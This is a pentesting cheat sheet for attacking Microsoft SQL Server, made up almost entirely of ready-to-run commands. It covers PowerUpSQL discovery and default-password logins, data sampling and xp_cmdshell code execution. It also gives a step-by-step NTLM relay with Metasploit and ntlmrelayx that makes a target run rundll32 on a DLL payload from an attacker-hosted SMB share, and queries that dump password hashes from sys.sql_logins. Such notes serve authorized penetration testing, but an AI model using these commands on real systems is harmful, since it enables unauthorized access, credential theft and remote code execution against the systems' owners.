Skip to main content

MSSQL

Connection​

ESC - Interactive .NET client for MSSQL abuse

Connect to MSSQL using windows authentication

mssqlclient.py <user>@<ip> -windows-auth

PowerUpSQL​

Identify SQL instances​

Authenticated user

Get-SQLInstanceDomain [| Get-SQLServerInfo]

Unauthenticated user

Get-SQLInstanceScanUDP

Check login access​

Attempt to login with a domain account

Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw -Verbose

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Threads 10 | Where-Object {$_.Status -like "Accessible"} | Export-Csv -Path .\targets.csv

Attempt to login with default password

Get-SQLServerDefaultLoginPw

Save instances with authenticated access to CSV file

powerpick Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw -Verbose

powerpick Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Threads 10 | Where-Object {$_.Status -like "Accessible"} | Export-Csv -Path .\targets.csv

Post-Exploitation on DB​

Perform actions specifying a single instance or all connected targets

Import-Csv -Path .\targets.csv | Get-SQLServerInfo

Invoke-SQLAudit -Verbose -Instance "<INSTANCE>"

List DB, tables, columns

Get-SQLInstanceDomain | Get-SQLDatabase
Get-SQLInstanceDomain | Get-SQLTable -DatabaseName <DB_name>
Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName <DB_name> -TableName <Table_name>

Search column names for a given keyword

Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "<word1,word2>" -Verbose -SampleSize 10

RCE

Invoke-SQLOSCmd -Verbose -Instance <instance_fqdn> -Command "<command>"

Crawling database link

Get-SQLServerLink
Get-SQLServerLinkCrawl
Get-SQLQuery -Instance "<SERVER1>" -Query 'EXEC "<SERVER2>".master..xp_cmdshell "whoami /all"'

SMB relay via xp_dirtree​

Prerequisites​

  • Linux OS with network access to the targets
  • EXECUTE privilege on xp_dirtree function with an authenticatd account on the DB
  • <MSSQL_HOST> runs with an account that has admin rights on <TARGET_RELAY>

Step 1 - Create a virtual interface​

ifconfig <IFACE>:0 <AVAILABLE_IP> netmask <NETMASK>

<IP1> will be the IP of eth0 and <IP2> will be the IP of eth0:0

Step 2 - Configure MSF​

use admin/mssql/mssql_ntlm_stealer

set RHOSTS <MSSQL_RHOST>
set RPORT <RPORT>

set SMBPROXY <IP1>

set USE_WINDOWS_AUTHENT true

Step 3 - Start ntlmrelayx​

sudo impacket-ntlmrelayx -smb2support -t <TARGET_RELAY> -c 'rundll32.exe \\<IP2>\public\<PAYLOAD>.dll,Start' -ip <IP1>

Step 4 - Host the payload via SMB share​

sudo impacket-smbserver -smb2support public . -ip <IP2>

Step 5 - Start the attack in MSF​

run

Enable XP_CMDSHELL​

tip

Type one line at a time.

EXEC sp_configure 'show advanced options', 1;  
go  
RECONFIGURE;  
go  
EXEC sp_configure 'xp_cmdshell', 1;  
go  
RECONFIGURE;  
go  
xp_cmdshell '<cmd>'
go

Nmap

nmap -Pn -n --script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="<cmd>"

SQLCMD

sqlcmd -E -S localhost -Q "EXEC sp_databases;"
sqlcmd -E -S localhost -Q "SELECT name, password_hash FROM master.sys.sql_logins;"